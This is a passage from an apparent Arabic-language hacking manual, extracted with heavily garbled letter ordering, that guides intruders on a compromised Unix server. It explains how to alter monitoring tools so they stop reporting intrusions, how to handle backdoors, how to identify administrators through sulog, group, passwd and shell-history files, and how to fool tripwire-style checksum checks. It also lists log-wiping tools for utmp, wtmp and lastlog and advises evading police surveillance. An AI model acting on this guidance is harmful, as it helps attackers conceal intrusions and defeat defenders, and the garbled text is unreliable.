‫ﺘﺄﻛﺪ ﻣﻦأﻧﻬﺎ ﻻ‬ ‫ﺘﻲﺗ ﺮﺳﻠﻬﺎ ‪،‬ﻟﻠ‬ ‫ﺘﻘﺎرﯾ ﺮاﻟ‬‫ﺘﺄﻛﺪ ﻣﻦاﻟ‬ ‫ﺘﺄﻛﺪ ﻣﻦ وﺟﻮد ﻫﺬهاﻷدوا ت واﻟ‬ ‫ﺘ ﺤﻢأن ﯾ‬ ‫ﯾﻨﺒﻐﻲ ﻋﻠﻰاﻟﻤﻘ‬
‫ﺘ ﺤﺎم‬
‫ﻗ‬‫ﺗﻜﺸ ﻒ ﻋﻤﻠﯿﻪاﻷ‬
‫ﺘﯿﻦ‪:‬‬‫ﺘ ﺤﺎم‪ ،‬و ﯾﻤﻜﻦﺗﻨﻔﯿﺬ ذﻟﻚﺑﻄ ﺮﯾﻘ‬ ‫ﻗ‬ ‫ﺘﺄﻛﺪ ﻣﻦأﻧﻬﺎﻟﻦﺗﻘﻮمﺑﺎﻷﺑﻼ غ ﻋﻦاﻷ‬ ‫ﯾﻤﻜﻨﻚﺗﻌﺪﯾ ﻞ ﻣﻔﺎ ت ﻫﺬهاﻟﺒ ﺮاﻣ ﺞﻟﻠ‬
‫ﺘﻌﻤ ﻞﺑ ﺮﻧﺎﻣﺠﺎ‬ ‫ﺘﻪ وﺄﺳ‬ ‫ﺘﻌﺪﯾ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞﺑ ﺮﻣﺠﯿﺎﻟﻜﻲ ﻻ ﯾﻘﻮمﺑﺎﻷﺑﻼ غ ﻋﻨﻚ )واﺳﻌﻪ ﺷﻮﯾﻪ دي(أوﻗﻢﺑﺄزاﻟ‬ ‫ﻗﻢﺑ‬ ‫‪-‬‬
‫ﻣﺰﯾﻔﺎ‬
‫ﺘﻪ و ﻣ ﺤﺎوﻟﻪﺗ ﺤﻤﯿﻠﻪﺑﻄ ﺮﯾﻘﻪأ ﺧ ﺮى‬ ‫ﺘﻌﻤﻠ‬‫ـ ‪ back door‬ﺎﻟﺬيأﺳ‬ ‫ﻗﺪﺗ ﻀﻄ ﺮإﻟﻰأزاﻟﻪاﻟ‬ ‫‪-‬‬

‫‪٥٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪-‬ﺗ ﺤﻘ ﻖ ﻣﻦ وﺟﻮداﻟﻤﺪرا ء‪Admins‬‬


‫****************************‬
‫ﺘﺨﺪاﻣﻬﺎ‪.‬‬
‫ﺘﻢأﺳ‬ ‫ﺘﻲ ﯾ‬
‫ﻗﻊ‪ ،‬وﺗ ﺤﺎو ل ﻣﻌ ﺮﻓﻪاﻟ ﺤﺴﺎﺑﺎ تاﻟﻌﺎدﯾﻪاﻟ‬
‫ﻣﻦاﻟﻤﻬﻢأنﺗﺠﺪ ﺟﻤﯿﻊاﻟﻤﺪرا ء ﻋﻠﻰ ﺎﻟﻤﻮ‬
‫ﺗﻮﺟﺪ ﻋﺪه ﻃ ﺮ قﻟﻜﺸ ﻒ ﻫﺬهاﻟﻤﻌﻠﻮﻣﺎ ت‪:‬‬
‫ـ‪alias‬‬‫ﻗﻢﺑﻔ ﺤ ﺺاﻟﻤﻠ ﻒ ‪ .forword‬ﻮ ﻣﺪ ﺧﻼ تاﻟ‬ ‫‪-‬‬
‫ﺘﺨﺪﻣﯿﻦاﻟﺬﯾﻦ ﻧﺠ ﺤﻮﻓﻲﺗﻨﻔﯿﺬاﻷﻣ ﺮ ‪su root‬ﺑﻨﺠﺎ ح‬ ‫ـ ‪ sulog‬ﻮ ﺣﺪداﻟﻤﺴ‬ ‫‪-‬ﺄﻓ ﺤ ﺺ ﻣﻠ ﻒاﻟ‬
‫ﻗﻪﺑﺎﻷداره ‪( admin, root,‬‬ ‫ﺘﻲﻟﻬﺎ ﻋﻼ‬ ‫ـ ‪ group‬ﻮأﺑ ﺤﺚ ﻋﻦ ﺟﻤﯿﻊاﻟﻤﺠﻤﻮﻋﺎ تاﻟ‬ ‫‪-‬ﺄﺳ ﺤﺐ ﻣﻠ ﻒاﻟ‬
‫‪wheel, etc‬‬
‫‪-‬ﺄﺳ ﺤﺐ ﻣﻠ ﻒ ‪passwd‬ﺑﺎﻟﻨﺴﺒﻪﻟﻠﻤﺪﯾ ﺮﻟﻌ ﺮ ضﻛﻠﻤﺎ ت ﺳ ﺮاﻟﻤﺪرا ء‬

‫ﺘﻚ‬ ‫ﺘﻄﺎﻋ‬ ‫ﻗﻊ‪.‬أد ﺧ ﻞإﻟﻰ ﻣﺠﻠﺪاﺗﻬﻢاﻟﺨﺎﺻﻪ )ﻓﻲ ﺣﺎﻟﻪ ﻋﺪمﺄﺳ‬ ‫ﯾﻌﺪﻛ ﻞ ﻫﺬا ‪ ،‬ﯾﻤﻜﻨﻚ ﻣﻌ ﺮﻓﻪﻛ ﻞاﻟﻤﺪرا ء ﻋﻠﻰاﻟﻤﻮ‬
‫ﺘﺨﺪم( ‪ .‬وأﻓ ﺤ ﺺاﻟﻤﻠﻔﺎ ت‬ ‫ﺘ ﺤﺎ ل ﺷﺨﺼﯿﻪ ﺎﻟﻤﺴ‬ ‫ﺘﺎﻟﯿﻪ ‪chid.c, changeid.c‬ﻷﻧ‬ ‫ﺘﺨﺪمأ ﺣﺪىاﻷدوا تاﻟ‬ ‫‪،‬أﺳ‬
‫ﺘﻌﻤﻠﻮﻧﻬﺎ ﻋﺎدة‪،‬ﻗﺪ ﯾﻔﯿﺪك‬ ‫ﺘﻲ ﯾﺴ‬‫ﺘﺎﻟﯿﻪ ‪history/.sh_history/.bash_history‬ﻟﻤﻌ ﺮﻓﻪ ﺎﻷواﻣ ﺮاﻟ‬ ‫اﻟ‬
‫ﺘﺸﺎ ف ﻣﻌﻠﻮﻣﺎ ت ﻣﺨﻔﯿﻪ‪.‬ﻗﻢﺑﻔ ﺤ ﺺ ﻣﻠﻔﺎ ت‬ ‫ﻗﻊ‪،‬أوﺄﻛ‬ ‫ﻫﺬاﻓﻲ ﻣﻌ ﺮﻓﻪ دوراﻟﻤﺪﯾ ﺮ ﻋﻠﻰاﻟﻤﻮ‬
‫ﺘﺨﺪم‪ ،‬وإذا ﻣﺎﻛﺎﻧ ﺖأدوا ت‬ ‫ﺘﻲﺗﺴ‬ ‫ـ ‪alias‬ﺎﻟ‬ ‫‪.profile/.login/.bash_profile‬ﻟﻤ ﺮاﺟﻌﻪﺄﻋﺪادا تاﻟ‬
‫ﺘﺨﺪﻣﻪ‪ .‬و ﻣﻦ ﺎﻟﻄﺒﯿﻌﻲ ﻃﺒﻌﺎأنﺗﻘﻮمﺑﻔ ﺤ ﺺﻛﺎﻓﻪاﻟﻤﻠﻔﺎ ت واﻟﻤﺠﻠﺪا ت ‪ ،‬ﺧﺎﺻﻪاﻟﻤﺨﻔﯿﻪ ﻣﻨﻬﺎ‬ ‫أﻣﻨﯿﻪ ﺧﻔﯿﻪ ﻣﺴ‬
‫ﻗﺪﺗﺠﺪﺑﻌ ﺾ ﺎﻷﺷﯿﺎ ءاﻟﻤﻔﯿﺪه ﺣﻘﺎ‬

‫‪checksum checking software‬‬


‫************************‬
‫ُ ﺤﺴﺐ ﻣﻦ‬
‫ﺘﺄﻛﺪ ﻣﻦ ﺧﻠﻮاﻟﺒﯿﺎﻧﺎ ت ﻣﻦاﻷ ﺧﻄﺎ ء‪.‬ﻫﺬهاﻟﻘﯿﻤﺔﺗ‬
‫ﺘﻌﻤ ﻞﻟﻠ‬‫ُﺴ‬
‫ﻗﻤﯿﺔﺗ‬
‫ﺑ ﺮاﻣ ﺞ ‪) checksum‬ﻫﻮﻗﯿﻤﺔ ر‬
‫ﺧﻼ ل ﻋﻤﻠﯿﺔﻛﺸ ﻒ ﺎﻟﺠﻤﻊ(‬

‫ﺘ ﺤﻘ ﻖ ﻣﻦ ﺣﺪو ثايﺗﻐﯿﯿ ﺮا تﻓﻲ ﺎﻟﻤﻠﻔﺎ ت‪ ،‬وﻓﻲ ﺣﺎﻟﺔ ﺣﺪو ثاي‬ ‫ﺘﻌﻤﺎ لﺑ ﺮاﻣ ﺞﻟﻠ‬‫ﺑﻌ ﺾاﻟﻤﺪرا ء وﯾﻘﻤﻮنﺑﺎﺳ‬
‫ﺘﺸﺎﻓﻬﺎ‬ ‫ﺘﻄﯿﻊاﻛ‬ ‫ﺗﻐﯿ ﺮ‪ ،‬ﯾﻘﻮمﺑﻔ ﺤ ﺺاﻟﻤﻠﻔﺎ ت وﯾﺴ‬
‫ﺘﺨﺪﻣ ﺖ؟ واذاﻋ ﺮﻓ ﺖﻓﻜﯿ ﻒﺗﻌﺪﻟﻬﺎﺑ ﺤﯿﺚ‬‫ﺘ ﺤﻘ ﻖ واياﻻﻧﻮا عاﺳ‬‫ﺘﺨﺪﻣ ﺖ ﻫﻨﺎكﺑ ﺮاﻣ ﺞاﻟ‬ ‫ﻓﻜﯿ ﻒﺗﻌ ﺮ ف ﻣﺎاذااﺳ‬
‫ﺗﺨﺪم ﻣﻦاﺟﻠﻚ ؟‬
‫ﺘﺸﺎ ف ﻣﺎاذا‬‫ﺘﺎﺑﺔ وا ﺣﺪة ﻣﻨﻬﺎﺑﻨﻔﺴﻚ وﻟﻜﻦ ﻣﻦاﻟﺼﻌﺐاﻛ‬ ‫ﺘ ﺤﻘ ﻖ وﻣﻦاﻟﺴﻬ ﻞﻛ‬ ‫ﻫﻨﺎكاﻧﻮا ع ﻋﺪﯾﺪة ﻣﻦﺑ ﺮاﻣ ﺞاﻟ‬
‫ﺘﺨﺪﻣ ﺖ ﻣﺜ ﻞﺗﻠﻚاﻟﺒ ﺮاﻣ ﺞ ﻋﻠﻲاﻟﻤﻠﻔﺎ تﻟﻠ ﺤﻤﺎﯾﺔ‬ ‫اﺳ‬
‫ﺘﻲﺗﻘﻮم ب ﻋﻤﻠﯿﺔﻓ ﺤ ﺺ‪checksum‬‬ ‫ﻫﺬهاﺳﻤﺎ ءﺑﻌ ﺾاﻟﺒ ﺮاﻣ ﺞاﻟ‬
‫‪SOFTWARE : STANDARD PATH : BINARY FILENAMES‬‬
‫‪tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire‬‬
‫‪binaudit : /usr/local/adm/audit : auditscan‬‬
‫‪hobgoblin : ~user/bin : hobgoblin‬‬
‫‪raudit : ~user/bin : raudit.pl‬‬
‫‪l5 : compile directory : l5‬‬

‫ﺘﻤﺎﻻ تﻛﺜﯿ ﺮة‪ ،‬رﺑﻤﺎاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻧﻔﺴﻪاوﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ ت ﯾﻮﺟﺪ ﻋﻠﻲ ﺟﺰ ء آ ﺧ ﺮ‪ ،‬ﻣﺜ ﻞ ﺟﺰ ء‬ ‫ﻛﻤﺎﺗ ﺮيﻫﻨﺎكا ﺣ‬
‫ﺘﻲﺗ ﺤﻤ ﻞ ﻣﻌﻠﻮﻣﺎ ت ‪checksum‬ﻓﻲ ﺟﻬﺎز‬ ‫ﺘﻲﻗﻮاﻋﺪﺑﯿﺎﻧﺎ تاﻟ‬ ‫‪NTFS‬ﻟﻤ ﻀﯿ ﻒاو ﺟﻬﺎز آ ﺧ ﺮ ‪،‬او ﺣ‬
‫ﻗ ﺮا ص ‪ CD‬ﻣﺜﻼ ( ‪...‬‬ ‫ﺘﺎﺑﺔ )ا‬‫ﻣ ﺤﻤﻲ ﻋﻠﻲ ﺎﻟﻜ‬
‫ﺘﻚ‪،‬‬
‫ﺘﺨﺪمﻓﻔ ﺮﺻ‬ ‫ﺘﺨﺪﻣﺔ ‪ ،‬واذاﻟﻢﺗﺴ‬ ‫ﺘﻄﻼﻋﻲ ﺳ ﺮﯾﻊﻟﻤﻌ ﺮﻓﺔاﻟﺒ ﺮاﻣ ﺞاﻟﻤﺴ‬ ‫ﻮﻟﻜﻦ ﯾﻤﻜﻨﻚاﻟﻘﯿﺎمﺑﻌﻤﻠﯿﺔﻓ ﺤ ﺺاﺳ‬

‫‪٥٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊاواﻟﻤﺰود‬
‫ﺘﻠﻚاﻻﻧﻮا ع ﻣﻦاﻟﺒ ﺮاﻣ ﺞ ﻫﺬا ﯾﻌﻨﻲاناﻟﻤﻮ‬ ‫ﺘﺨﺪاﻣﻬﻢﻟ‬
‫ﺘﺎﻛﺪا ﻣﻦاﺳ‬
‫ﻮاذاﻟﻢﺗﺠﺪ ﺷﻲ وﻟﻜﻨﻚﻛﻨ ﺖ ﻣ‬
‫ﻣ ﺤﻤﻲﺑﺸﻜ ﻞ ﺟﯿﺪا )ﻫﺎردﻟﻚ ( وﯾﺠﺐان ﻻﺗﻌﺒﺚﺑﺎﻟﻤﻠﻔﺎ تاﺑﺪا ‪..‬‬

‫ﺘﺨﺪﻣﻮنﺗﻠﻚاﻟﺒ ﺮاﻣ ﺞ وﺑﺎﻣﻜﺎﻧﻚﺗﻐﯿﯿ ﺮﻫﺎ؟؟‬‫ﺘﺸﻔ ﺖاﻧﻬﻢ ﯾﺴ‬‫ﻮﻟﻜﻦ ﻣﺎاﻟﻌﻤ ﻞاذا ﺎﻛ‬


‫ﯾﻤﻜﻨﻚ‬
‫ﺘﻢﺗ ﺤﺪﯾﺚﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ ت ﻣﺜﻼ‬
‫‪- ١‬اﯾﻬﺎمﺗﻠﻚاﻟﺒ ﺮﻧﺎﻣ ﺞﺑﻄ ﺮ ق ﺷ ﺮﻋﻲﺑﺎﻧﻪﺗﻢﺗﻐﯿﯿ ﺮ ﻣﻠ ﻒ ﻣﺎﺑﺸﻜ ﻞﻗﺎﻧﻮﻧﻲ وﯾ‬
‫‪"tripwire -update /bin/target".‬‬

‫ﺘﻢﻓ ﺤﺼﻬﺎ ﻣ ﺮة‬


‫ﺘﻲ ﯾﺠﺐﻓ ﺤﺼﻬﺎ ﻮﺗﺰﯾ ﻞاﺳﻢاﻟﻤﻠﻔﺎ تاﻟﻤ ﺮاد ﻣﻦاﻟﻘﺎﺋﻤﺔﻓﻼ ﯾ‬ ‫‪-٢‬اﻧﻚﺗﻐﯿﯿ ﺮﻗﺎﺋﻤﺔاﻟﻤﻠﻔﺎ تاﻟ‬
‫ﺘﻢﻓ ﺤﺼﻬﺎ ب ‪checksum‬‬ ‫ﺘﺎﻛﺪاﯾ ﻀﺎان ﻣﻠ ﻒﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ ت ﻧﻔﺴﻬﺎ ﻻ ﯾ‬
‫ﺘ ﺤﻘ ﻖ ) وﻟﻜﻦ ﯾﺠﺐانﺗ‬ ‫ا ﺧ ﺮيﻟﻠ‬
‫ﺘﻲﻗﻤ ﺖﺑﻬﺎ (‬‫ﺘﻐﯿﯿ ﺮا تاﻟ‬
‫ﺘﺸﺎ فاﻟ‬‫ﺘﻢاﻛ‬ ‫ﺘﻲ ﻻ ﯾ‬ ‫ﺣ‬

‫ﺘﺨﺪماﻻﻣﻨﯿﻪ‬ ‫ﺣﯿ ﻞاﻟﻤﺴ‬


‫*******************‬
‫ﺘﻬﺎﻓﻘﻂ ﻻﻛﻮن ﺷﻤﻠ ﺖﻛ ﻞ ﺷﺊ )ﻟﻜﻤﺎ لاﻟﻤﻮ ﺿﻮ ع ( ‪..‬ﻓﺒﻌ ﺾ‬
‫ﺘﺒ‬
‫ﺘﺨﺪمﻟﻜﻨﻨﻲﻛ‬‫ﻫﺬهاﻟ ﺤﯿ ﻞ ﻣﺎ ﻧﺪرﺗﻮﺟﺪاوﺗﺴ‬
‫ﺘ ﺮاﻛﺎﺗﻬﻢ ‪ admins‬ﻮﺑﺎﻟﻄﺒﻊ ﻻ ﯾ ﺮﯾﺪونان ﯾﻌﺒﺚﻓﻲ ﻣﻠﻔﺎﺗﻬﻢاي ﺷﺨ ﺺﻓﯿﻘﻮﻣﻮن‬ ‫ﺘﺨﺪﻣﯿﻦ ﯾﺴﻤﻮناﺷ‬ ‫اﻟﻤﺴ‬
‫ﺑﻌﻤ ﻞﺑﻌ ﺾاﻟ ﺤﯿ ﻞﻓﻲ ﻣﻠﻔﺎ تا ل ‪startup‬ﻟﺬاﻓﺪاﺋﻤﺎﺗ ﺤﻘ ﻖ ﻣﻦ ‪.profile, .cshrc, .login, .logout‬‬
‫ﺘﻲﺗﺒﺪاﺑﻨﻘﻄﻪ (‬ ‫ﺎﻟ ﺦ )اياﻟﻤﻠﻔﺎ ت ﺎﻟ‬

‫ﺎﻟﺠﺰ ءاﻟﺨﺎﻣ ﺲ ‪:‬‬


‫=========‬
‫ﻗﺒﻪ؟‬ ‫ﻣﺎذاﺗﻔﻌ ﻞان ﻮ ﺿﻌ ﺖﺗ ﺤ ﺖاﻟﻤ ﺮا‬
‫***************************‬
‫ﺘﻰا ل ‪administrators‬ﻋﻠﯿﻚاﻟﻘﯿﺎم‬ ‫ﻗﺒﻪ ( ﻣﻦﻗﺒ ﻞاﻟﺸ ﺮ ﻃﻪاو ﺣ‬
‫ﺘﻰا ﺻ ﺤﺒ ﺖﺗ ﺤ ﺖاﻟﻤﯿﻜ ﺮوﺳﻜﻮب ) ﺎﻟﻤ ﺮا‬ ‫ﻣ‬
‫ﺘﻄﯿﻌﻮاﻻﻣﺴﺎكﺑﺪﻟﯿ ﻞ )ﺑ ﺮﻫﺎن ( ﻋﻠﯿﻚ‬ ‫ﺘﻰﻻﯾﺴ‬ ‫ﺑﺨﻄﻮا ت ﻫﺎﻣﻪ و ﺳ ﺮﯾﻌﻪ ﺣ‬

‫ﺘﻰﺗﺜﺒ ﺖﺑ ﺮاﺗﻪ‬ ‫ﺘﻘﺎد ﺎ ل ‪ administrators‬ﺎﻧﻚ ‪hacker‬ﻓﺎﻧ ﺖ == > ﻣﺬﻧﺐ ﺣ‬ ‫‪-‬ﻣﻠ ﺤﻮﻇﻪ ‪:‬انﻛﺎنﻓﻲاﻋ‬
‫‪...‬‬
‫ﺘﻘﺪاﻧﻪ ﻻ ﯾﻮﺟﺪﻓ ﺮ قﺑﯿﻦا ل ‪ hacker‬ﻮا ل‬ ‫ﻗﺎ تاﻋ‬ ‫ﻻﯾﻌﻨﻲ ﺎﻟﻘﺎﻧﻮناي ﺷﺊﻟ ﻞ ( ‪admins‬ﺑﻌ ﺾاﻻو‬
‫ﺘﻘﺪون ﺎﻧﻚﻫﺎﻛ ﺮ‬ ‫‪administrator‬ﺎﻻﺑﺎن ﻣﺎﻟﻚاﻟﻜﻮﻣﺒﯿﻮﺗ ﺮ ﻫﻮا ل ‪administrator‬ﻓﻘﻂ ( ﻋﻨﺪﻣﺎ ﯾﻌ‬
‫ﺘ ﺮ فاﻻدﻣﯿﻦ‬ ‫ﺘ ﺮوﻧﻲ و ﻣﻠﻔﺎﺗﻚ ﻮانﻛﺎن ﻣ ﺤ‬ ‫ﻗﺒﺔﺑ ﺮﯾﺪكاﻟﻠﻜ‬ ‫ﻓﺎﻧﻚﻓﻮراا ﺻﺒ ﺤ ﺖ ﻣﺬﻧﺐ ‪ ..‬ﺳﯿﻘﻮﻣﻮ ﻣﺒﺎﺷ ﺮةﺑﻤ ﺮا‬
‫ﺳﯿ ﺮ ﺻﺪكاﯾ ﻀﺎ ﻫﺠﻤﺎﺗﻚاﻻ ﺧ ﺮى ‪..‬‬
‫ﻗﺒﺔ ﺧﻂﺗﯿﻠﯿﻔﻮﻧﻚ ‪..‬‬
‫ﻗﺒﺔﻛ ﻞ ﻫﺬهاﻻﺗﺼﺎﻻ تاﻛﯿﺪﺑﺒﺴﺎ ﻃﻪ ﯾﻤﻜﻨﻬﻢ ﻣ ﺮا‬ ‫ﺎذاﻛﺎن ﯾﻤﻜﻨﻬﻢ ﻣ ﺮا‬
‫ﺘﻰارد تانﺗ ﺤﺬرا ﺻ ﺤﺎﺑﻚﻓﻼﺗﺨﺒ ﺮﻫﻢ‬ ‫ﻗﺎﺗﻚ ‪ ..‬وان ﺣ‬ ‫ﺘﺮ‬ ‫ﻟﺬاﻓﻌﻠﯿﻚ ﻋﺪماﻟﻘﯿﺎمﺑﺎياﺗﺼﺎﻻ تﻓﯿﻬﺎا ﺧﺒﺎرا ﺧ‬
‫ﺘ ﺮوﻧﻲ )اﻻاذاﻛﺎن ﻣﺸﻔ ﺮا( و ﻣﻦاﻻﻓ ﻀ ﻞانﺗﺨﺒ ﺮﻫﻢ ﻋﻨﺪﻣﺎﺗﻘﺎﺑﻠﻬﻢ وﺟﻬﺎﻟﻮﺟﻪ ‪ ..‬و‬ ‫ﻫﺎﺗﻔﯿﺎاوﺑﺒ ﺮﯾﺪاﻟﻜ‬
‫ﺗﻤﻨﻌﻬﻢ ﻣﻦ راﺳﺎ لاي رﺳﺎﺋ ﻞ ﻏﯿﯿ ﺮ ﻋﺎدﯾﻪ ‪..‬‬
‫ﺘﻘﺪ‬‫ﺘﻮاﺟﻪ ﻣﺸﺎﻛ ﻞ ﺎﻋ‬‫ﻗ ﻞ ﻣﻦ ﺷﻬ ﺮاﻟﻰ ﺷﻬ ﺮﯾﻦ ‪ ..‬واﻻ ﺳ‬ ‫ﺘﺆﻣﻦ ﻧﻔﺴﻚ ﻋﻠﯿﻚانﺗﺒﻘﻰ ﻋﻠﻰﻫﺬااﻟ ﺤﺎ ل ﻋﻠﻰاﻻ‬ ‫ﻟ‬

‫‪٥٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺎﻧﻚ ﻻﺗ ﺮﻏﺐﺑﻬﺎ‬

‫ﺎﻟﺠﺰ ءاﻟﺴﺎدس ‪:‬‬


‫=========‬
‫ﻣﺎاﻟﺬي ﻋﻠﯿﻚاﻟﻘﯿﺎمﺑﻪ واﯾ ﻀﺎاﻟﺬي ﻻﺑﺪ ﻣﻦ ﻋﺪماﻟﻘﯿﺎمﺑﻪﻓﻲ ﺣﺎﻟﺔاﻧﻪﺗﻢاﻟﻘﺒ ﺾ ﻋﻠﯿﻚ‪:‬‬
‫**************************************************‬

‫**************‬
‫ﺘ ﺤﻘﯿ ﻖﺑﻤﻔ ﺮدك ‪..‬ﻓﺎ ﻃﻠﺐ ﻣ ﺤﺎﻣﯿﻚﻛﻲ‬ ‫ﺘﺬﻛﻰاﻧ ﺖ وﺗ ﺮد ﻋﻠﻰاﻟ‬‫ﺎوﻻ ‪:‬ا ﻃﻠﺐ ﻣ ﺤﺎﻣﯿﻚﻓﻮرا !!!! ‪:‬ﻻﺗ ﺤﺎو لﺑﺎنﺗ‬
‫ﯾﺪاﻓﻊ ﻋﻨﻚﻫﻮ و ﯾﻄﻠﻌﻚ ﻋﻠﻰ ﻣﺎ ﯾﺠﺐانﺗﺬﻛ ﺮه و ﻣﺎ ﯾﺠﺐان ﻻﺗﺬﻛ ﺮه ﻧﻬﺎﺋﯿﺎ ‪..‬ﺑﻌﺪﻫﺎ ﻏﺎﻟﺒﺎ ﻣﺎ ﺳﯿﻄﻠﺐ‬
‫ﺘﯿﺎﺟﻪﻓﻲاﻟﻌﻤ ﻞ واﻻ ﻋﻠﯿﻬﻢﺗ ﺤﻤﯿ ﻞ ﺟﻤﯿﻊاﻻﻋﺒﺎ ء‬ ‫ﻗﺼﻰ ﺳ ﺮﻋﻪﺑ ﺤﺠﺔا ﺣ‬ ‫اﻟﻤ ﺤﺎﻣﻲ ﺟﻬﺎزك )اﻟﻜﻮﻣﺒﯿﻮﺗ ﺮ (ﺑﺎ‬
‫ﺘﺨﺪاماﻟﺠﻬﺎز ‪..‬ﻟﺬاﻓﺎﻧﻪ ﻣﻦاﻟﻌﻤﻠﻲ ﺟﺪاان ﯾﻜﻮن ﻋﻨﺪك‬ ‫ﺘﻲﻗﺪﺗ ﺤﺪ ث ﻋﻦ ﻋﺪكاﺳ‬ ‫اﻟﻤﺎدﯾﻪ واﻟﻤﺸﺎﻛ ﻞاﻟ‬
‫ﺘﺪوﯾ ﺮ‬‫ﻗ ﺖﻗﺒ ﻞانﺗﻘﻊاﻟﻔﺎسﻓﻲاﻟ ﺮاس وﺑﻌﺪﻫﺎﺗﺒﺪاﻓﻲاﻟﺒ ﺤﺚ واﻟ‬ ‫ﻣ ﺤﺎﻣﻲ ﺟﺎﻫﺰﻓﻲاي و‬
‫ﺘﻜﻠﻢاﻻاﻟﺸ ﺮ ﻃﻪ !!! ‪:‬ﻻﺗﻌﻄﻲﻟﻠﺸ ﺮ ﻃﻪاي ﻣﻌﻠﻮﻣﺎ ت ﻋﻨﻚاو ﻋﻦ زﻣﻼﺋﻚﺑ ﺤﺠﺔان ﻫﺬا‬ ‫ﺛﺎﻧﯿﺎ ‪:‬اﺑﺪا ﻻﺗ‬
‫ﺳﯿﺨﻔ ﻒاﻟﻌﻘﺎب ﻋﻨﻚ و ﺳﯿﺨ ﺮﺟﻚ ﻣﻦاﻟﻤﺎز ق ‪..‬ﻻن ﻫﺬاﻟﻦ ﯾﻔﯿﺪكﺑ ﻞ ﺳﯿﺪﯾﻨﻚاﻛﺜ ﺮ ‪ ..‬وانﻛﺎن ﯾﺠﺐ‬
‫ﻗﻚ (‬
‫ﺘﻢ ﻫﺬاﻓﻘﻂ ﻣﻦ ﺧﻼ ل ﻣ ﺤﺎﻣﯿﻚ ) وﻫﺬااﯾ ﻀﺎ ﺣ ﻖ ﻣﻦ ﺣﻘﻮ‬ ‫ﺘﺠﻮاﺑﻚﻓﺎ ﻃﻠﺐان ﯾ‬ ‫اﺳ‬
‫ﺘﺴﻊ‬ ‫ﺘ‬‫ﻗﺎؤكﻟﯿ ﺲﻗﻘﻂﻛﻨﻮ ع ﻣﻦاﻟﺸﻬﺎﻣﻪ ‪..‬اﻧﻤﺎاﯾ ﻀﺎﺑﺪ ﺧﻮ لا ﺻ ﺤﺎﺑﻚﻓﻲ ﺎﻟﻤﻮ ﺿﻮ ع ﺳ‬ ‫ﻻﺗﺨﺒ ﺮاﺑﺪا ﻋﻦاﺻﺪ‬
‫داﺋ ﺮةاﻟﻤﻮ ﺿﻮ ع و ﻣﻦﺛﻢﺗﺰﯾﺪاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻨﻚ و ﻋﻦ ﺟ ﺮاﺋﻤﻚ و ﻫﻢاﯾ ﻀﺎ!‬
‫ﺘﻄﻊاﻟﺸ ﺮ ﻃﻪﻓﻚﺗﺸﻔﯿ ﺮ ﻣﻠﻔﺎﺗﻚاو ﺟﺰ ء ﻣﻦ ﺎﻟﻬﺎرد دﯾﺴﻚﻓﯿﻤﻜﻨﻚ‬ ‫ﺑﻌ ﺾاﻟﺪو ل ﻣﻦ ﺿﻤﻦﻗﺎﻧﻮﻧﻬﺎاﻧﻪاذاﻟﻢﺗﺴ‬
‫ﺘﻬﻰاﻟ ﺤ ﺮﯾﻪ ﻋﺪماﻻﻓﺼﺎ ح ﻋﻨﻬﺎ‬ ‫ﺑﻤﻨ‬
‫ﻗﻌ ﺖﻓﻲاﻟﻤﺼﯿﺪه ﻻﺑﺪانﺗﺪﻟﻲﻟﻬﻢﺑﻜ ﻞ ﺷﺊﻓﻲ ﻫﺬه‬ ‫ﻟﻜﻦﺑﻌ ﺾاﻟﺪو لاﻻ ﺧ ﺮىﻓﻲﻗﺎﻧﻮﻧﻬﺎاﻧﻪ ﻣﺎداﻣ ﺖ و‬
‫ﻗ ﺮا ص ﺻﻠﺒﻪ ﻣﺸﻔ ﺮه‬ ‫ﺘﺸﺎرة ﻣ ﺤﺎﻣﯿﻚ واﻧﻜﺎراﻧﻚﻟﺪﯾﻚايا‬ ‫اﻟ ﺤﺎﻟﻪاﻧﺼ ﺤﻚﺑﺎﺳ‬

‫ﺎﻟﺠﺰ ءاﻟﺴﺎﺑﻊ‪:‬‬
‫========‬
‫ﺘﺒﺎ ء‪:‬‬
‫ﺘﺨﻔﻲ واﻻ ﺧ‬ ‫ﻗﺎﺋﻤﻪﺑﺎﻓ ﻀ ﻞاﻟﺒ ﺮاﻣ ﺞﻟﻠ‬
‫******************************‬
‫‪Change - Changes fields of the logfile to anything you want‬‬
‫‪Delete - Deletes, cuts out the entries you want‬‬
‫‪Edit - real Editor for the logfile‬‬
‫‪Overwrite - just Overwrites the entries with zero-value bytes.‬‬
‫!‪Don't use such software (f.e. zap) - it can be detected‬‬
‫‪---------------------------------------------------------------‬‬
‫‪LOG MODIFIER‬‬
‫‪++++++++++‬‬

‫‪ah-1_0b.tar Changes the entries of accounting information‬‬


‫‪clear.c Deletes entries in utmp, wtmp, lastlog and wtmpx‬‬
‫‪cloak2.c Changes the entries in utmp, wtmp and lastlog‬‬
‫‪invisible.c Overwrites utmp, wtmp and lastlog with predefines values,‬‬
‫‪so‬‬
‫! ‪it's better than zap. Watch out, there are numerous inv*.c‬‬

‫‪٥٧‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

marryv11.c Edit utmp, wtmp, lastlog and accounting data - best!


wzap.c Deletes entries in wtmp
wtmped.c Deletes entries in wtmp
zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!
--------------------------------------------------------------------------------------
: ‫ﺎﻟﺠﺰ ء ﺎﻟﺜﺎﻣﻦ‬
=========
‫ﺘﺎﻣﯿﻪ‬‫ﻛﻠﻤﻪ ﺧ‬
**********
